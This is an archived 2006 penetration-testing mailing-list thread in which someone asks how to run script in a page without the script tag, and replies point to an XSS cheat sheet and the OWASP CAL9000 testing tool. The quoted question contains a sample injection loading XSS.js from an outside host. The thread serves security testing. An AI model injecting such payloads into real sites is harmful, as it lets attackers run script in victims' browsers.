RE: XSS - how to run script
- From: "Joshua Perrymon" <josh.perrymon@xxxxxxxxxxxxxxx>
- Date: Fri, 20 Oct 2006 09:09:46 +1000
One of the best repositories of exotic ways to perform XSS
(with or without evasion, with or without script tag) is the
XSS cheat sheet:
http://ha.ckers.org/xss.html
http://www.owasp.org/index.php/Category:OWASP_CAL9000_ProjectI Agree 100%. I would look at the Cal9000 tool on the OWASP website.
It uses Rsnakes XSS library and includes it in a Website/Tool/Scratchpad to
use during these APP tests. I put Cal9000 on the first version of the OWASP
Live CD but it won't be released for another Month. If you use it just make
sure your Browser is Firefox... It doesn't like Opera or others.
Cheers,
JP
Joshua Perrymon, CE|H,OPST,OPSA
Sr. Security Consultant
-----------------------------------------
Pure Hacking - The Leaders In Internet Security
-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx
[mailto:listbounce@xxxxxxxxxxxxxxxxx] On Behalf Of A. R.
Sent: Friday, 20 October 2006 6:23 AM
Cc: Penetration Testing; Web Application Security
Subject: Re: XSS - how to run script
One of the best repositories of exotic ways to perform XSS
(with or without evasion, with or without script tag) is the
XSS cheat sheet:
http://ha.ckers.org/xss.html
hth
--
icesurfer
Tal Argoni wrote:
Does anyone have any----------------------------------------------------------------------
techniques/knowledge/examples/ideas/etc
of how it possible to run script
without using the <script> tag,
and without evasion techniques ?
<script
src=http://www.www.com/XSS.js></script>
Thanks allot
LegendaryZion
--http://www.cenzic.com/products_services/download_hailstorm.php?camp=70
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
1600000008bOW----------------------------------------------------------------------
--
--------------------------------------------------------------
----------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
?camp=701600000008bOW
--------------------------------------------------------------
----------
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------
- References:
- Re: XSS - how to run script
- From: A. R.
- Re: XSS - how to run script
- Prev by Date: RE: SNMP write permissions in "Windows 2003"
- Next by Date: Re: XSS - how to run script
- Previous by thread: Re: XSS - how to run script
- Next by thread: Re: XSS - how to run script
- Index(es):
Relevant Pages
|